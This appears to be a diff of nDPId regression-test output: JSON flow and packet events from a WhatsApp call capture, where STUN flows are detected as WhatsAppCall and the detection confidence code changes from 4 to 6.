00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalSUAAEARuYTAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaZm0AAEAR6DzAqAIEHw1JMM46DZYAhue1AAMAaiESpEIAAPA16Ue1KOAmhBVAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACajDIAAEARrnfAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296337,"flow_last_seen":1432582296337,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296337,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1432582296337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296337,"pkt":"xiwDYGpkAPS5Jrv0CABFwACalgkAAEARpKDAqAIEHw1dMM46DZYAhkaaAAMAaiESpEIAABQXleBLNAVxhWFAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaRlMAAEARAcfAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1Y0AAEARcozAqAIEHw1PwM46DZYAhjlFAAMAaiESpEIAAL9\/1m08YXkuT0ZAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaIqQAAEARINbAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"179.60.192.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaNRkAAEARDmHAqAIEszzAMM46DZYAhuAOAAMAaiESpEIAAHR4erx3E5L39hlAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa4C0AAEARtrvAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaP+kAAEARVwDAqAIErfxyAc46DZYAhqERAAMAaiESpEIAAPckPngMfZVuqj1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1432582296338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296338,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaOAUAAEARBaXAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296338,"flow_last_seen":1432582296338,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296338,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.90.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaLOMAAEAREMfAqAIEHw1aMM46DZYAhuQ6AAMAaiESpEIAAEIAbV8qcywo32JAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACafE8AAEAR0VrAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":883,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.74.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACa1VQAAEAReFXAqAIEHw1KMM46DZYAhr8lAAMAaiESpEIAAMYoECn4BPzbT0BAAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1432582296339,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1432582296339,"pkt":"xiwDYGpkAPS5Jrv0CABFwACaPWIAAEARBkjAqAIEHw1UMM46DZYAhgQrAAMAaiESpEIAAPM63M4iUJ72Oh1AAQBmAQAMg3Xe01iNThr0oMxz4g8yD3fN+Bpz1wfmSsMwaadvnUwroGLz0VM5S4DttzrmDPMSBOgeXpPF04uIBCkoaMH+hW2Svovhs3GWh\/N1CnZ6UVrnXy6FvDLog+b+F7o9EvQF2yeF"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":885,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582296339,"flow_last_seen":1432582296339,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582296339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.84.48","src_port":52794,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 